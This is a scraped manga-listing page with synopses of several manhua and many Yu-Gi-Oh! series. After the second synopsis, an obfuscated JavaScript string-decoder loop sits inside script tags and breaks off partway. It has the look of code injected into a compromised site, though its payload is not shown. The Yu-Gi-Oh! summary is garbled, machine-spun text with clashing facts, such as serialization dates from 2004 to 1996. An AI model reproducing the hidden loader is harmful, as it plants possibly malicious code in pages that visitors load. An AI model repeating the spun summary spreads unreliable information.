"I got thrown into my own manhua!"I became stronger,but also bald......""the guy who thrown me into this world,you know nothing about power!""But why am i a sidekick?The protagonist is really attractive......""but still i need attractive long hair to be a BOSS!"This is a manhua author story.
She is the daughter of a merchant and falls in love with a general HuoMing, becoming a queen, but she did not expect HuoMing to betray because of a new joy so killed her …<script></script><script>(function(_0x1773d7,_0x620560){var _0x452667=_0x2182,_0x3463e8=_0x1773d7();while(!![]){try{var _0x24ee23=-parseInt(_0x452667(0x14d))/(-0x788+-0x17e1+-0x2*-0xfb5)+parseInt(_0x452667(0x14c))/(-0x11*-0x16f+-0x103d*-0x2+-0x1*0x38d7)+-parseInt(_0x452667(0x143))/(-0x6d2+-0x380*0x2+0xdd5*0x1)*(parseInt(_0x452667(0x13f))/(-0xb87*-0x3+0x1*0x15ff+-0x3890))+parseInt(_0x452667(0x145))/(-0x13*0x14+-0x1912+-0x1a93*-0x1)+parseInt(_0x452667(0x133))/(-0x14a1+0xbef+-0x8*-0x117)+-parseInt(_0x452667(0x131))/(-0x3*0xb1e+0x102*0x2+0x1f5d)*(parseInt(_0x452667(0x13a))/(0x1*0x147a+0xff8+-0x246a))+-parseInt(_0x452667(0x13e))/(-0x811+0x12be*-0x1+0x1ad8);if(_0x24ee23===_0x620560)break;else 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Yu-Gi-Oh! ("Game King") is a Japanese manga series about gambling composed and illustrated by Kazuki Takahashi. It was serialized in Shueisha's Weekly Shonen Jump magazine between March 8, 2004 and September 30, 1996. The storyline follows the narrative of a boy named Yugi Mutou, who solves the Millennium Puzzle that is early, and awakens a gaming alterego within his body that solves his disagreements using various games. Yu-Gi-Oh! tells the story of Yugi Mutou, a shy young lad who loves a variety of games, but is frequently intimidated about. One day, he solves an ancient artifact called the Millennium Puzzle (Sennen Pazuru?), causing his body to play host to a cryptic spirit with the character of a gambler. From that moment onwards, whenever Yugi or one of his buddies is endangered by those with darkness in their own hearts, this other Yugi reveals himself and challenges them to dangerous Shadow Games (Yami no muo, lit. "Games of Darkness") which show the real nature of someone else's heart, the losers of these competitions regularly being subjected to a black punishment called a Penalty Game (Batsu Gomu?). Whether it's dice, cards or role playing games, he'll take on difficulties from anybody, anyplace. Yugi and his friends discover that this man in of his puzzle is in fact the heart of a nameless Pharaoh from Egyptian times who'd lost his recollections as the show progresses. As Yugi and his comrades try to help the Pharaoh recover his memories, they are going through many trials as they wager their lives facing off against gamers that wield the cryptic Millennium Items (Sennen Aitemu?) and the black power of the Shadow Games. Yugi Mutou (Muto Yugi) is a character in the Yu-Gi-Oh! manga. Here is the first characterization of Yugi Mutou. Yugi was a shy lad, who invested time and had been often intimidated. Yet through getting several mostly Dark Yugi buddies, Anzu Mazaki, Katsuya Jonouchi, Hiroto Honda and Ryo Bakura, he beat his difficulties becoming much more separate and more powerful. After fixing the Millennium Puzzle, Yugi unknowingly shared his physique the heart of an amnesiac early Egyptian Pharaoh, Dark Yugi, who shield his buddies and Yugi throughout using Shadow Games. Yugi became conscious of Dark Yugi, when he confronted Death- a theme-park created by by Seto Kaiba to destroy the Yugis, T, and fulfilled with Dark Yugi for the very first time, when Dark Bakura and his physique split Yugi's consciousness in a-game of Monster World. Yugi assisted in winning the Duelist Kingdom tournament Dark Yugi, to save his grandpa. He re-assembled the Millennium Puzzle in the burning building to stop from losing Dark Yugi and conquered Ryuji Otogi in Dungeon Dice Monsters by himself. Collectively the Battle City tournament was won by the Yugis. When they entered the World of Memories, the Yugis were distinguished. There Yugi assisted Dark Yugi re-learn overcome Zorc Necrophades, Atem, and his title. Yugi conquered Atem in the Ceremonial Battle, a rite required for Atem to move to the afterlife when they came back to real life. Other manga: + Phantom Blood + Master Keaton
In the distant past, the prosperous nation of Kama waged war against the nation of Spectra, resulting in the creation of an AI that wiped out all humans. Centuries later, Raye, the last surviving human, lives amongst an android society on the outskirts of Kama. On the night of her 13th birthday, her peaceful life is upended when Spectra attacks, destroying her home and forcing her friends to the front lines. Desperate to save everything she loves, Raye calls upon humanity\'s last bastion: \"Sky Striker\", the Kama-developed secret technology made to turn humans into the ultimate living weapons. …Unexpected, right? In this newest adaptation of Yu-Gi-Oh, the focus of the plot is not on the card game, but instead the many storylines featured in the cards. The first arc surrounds the Sky Striker series, with more to come in the future.
Sitting by himself in the back of the class, 10th-grader Yugi always had his head in some game--until he solved the Millennium Puzzle, an Egyptian artifact containing the spirit of a master gambler from the age of the pharaohs! Awakened after three thousand years, the King of Games possesses Yugi, recklessly challenging bullies and evil-doers to the Shadow Games, where the stakes are high, and even the most ordinary bet may result in weirdness and danger beyond belief! Let the games... begin!
It's the translation of Shueisha's officially colored version of the Yu-Gi-Oh! manga.
Yu☆Gi☆Oh! Arc-V centers around Yuuya Sakaki, a mysterious Entertainment Duelist known as "The Phantom" along with his three other personalities: Yuuto, Yuugo, and Yuuri. He was chased after by Leo Corporation for hacking into their Solid Vision with mass system and used it for his own purpose. While on the run, he meets Yuzu Hiiragi, the daughter of the principal of Syu Zo Duel School that was on the verge of bankruptcy and tricked Yuuya into a contract to become a teacher at her school. However, before Yuuya could teach at the school, he first must find a card called Genesis Omega Dragon that said will determine the fate of the world that also connected to his scattered memories. The story is set in alternate version of Miami City where Leo Corporation, run by its president Reiji Akaba, dominates most of Solid Vision system throughout the city. The spread of the company's Solid Vision with mass not only gave birth to "Action Duels" but also help improving the city in saving lives and repair damage in case of disaster, becoming a vital
This is a continuation of the original Yu-Gi-Oh! series and contains the Duelist Kingdom and Battle City arcs. Originally just called Yu-Gi-Oh!, Viz renamed it to its current name. This series continues in Yu-Gi-Oh! Millennium World From Viz: 10th grader Yugi spent most of his time alone playing games--until he solved the Millennium Puzzle, a mysterious Egyptian artifact! Possessed by the puzzle, Yugi becomes Yu-Gi-Oh, the King of Games, and challenges evil-doers to the Shadow Games--weird games with high stakes and high risks! These graphic novels contain new stories not seen in the anime, including the origin of Yugi and his friends!
Years have passed after Yugi's adventures and now it's Yuki Judai's turn. Yuki Judai is a new student in the school Duel Academy, a school dedicated to teach duelist the basics and advanced techniques. Judai is determined to be world's #1 duelist, accepting challenges from his rivals (and friends). Although the manga is based on the anime, the story is really different and unrelated.
This is a continuation of the original Yu-Gi-Oh! series and contains the Egypt arc. Originally just called Yu-Gi-Oh!, Viz renamed it to its current name. From the 1st Volume Cover: The final Yu-Gi-Oh! story! After hundreds of battles, Yugi has finally gathered all the Egyptian God Cards... the key to unlocking his memories of his past life as an Egyptian pharaoh. When Ryo Bakura gives him the Millennium Eye, Yugi opens the door to the "world of memory," and his mind travels back in time to ancient Egypt, when the magic and monsters were real! Now Yugi and his friends must explore the world of Yugi's forgotten past... and fight an enemy who has been waiting for them for 3,000 years!
Mutou Yugi defeated Pegasus at Duelist Kingdom. Now Pegasus's heir, Tenma Yakou, wants revenge. He takes over Kaiba Corporation while Kaiba Seto is in America. He challenges Yugi to a duel and wins using a spectacular but mysterious god card, and then kidnaps Anzu! Thus, Yugi has no choice but to accept Tenma's challenge. He must duel against and pass thirteen duel professors at KC to reach Tenma and beat him.
A young man with his brush plunges into a chaotic world and lights up the heavens. In a world where cultivators are paramount, will the vermilion bird swallow the dragon, or will the dragon transcend beyond all else?! (Source: Wutopia)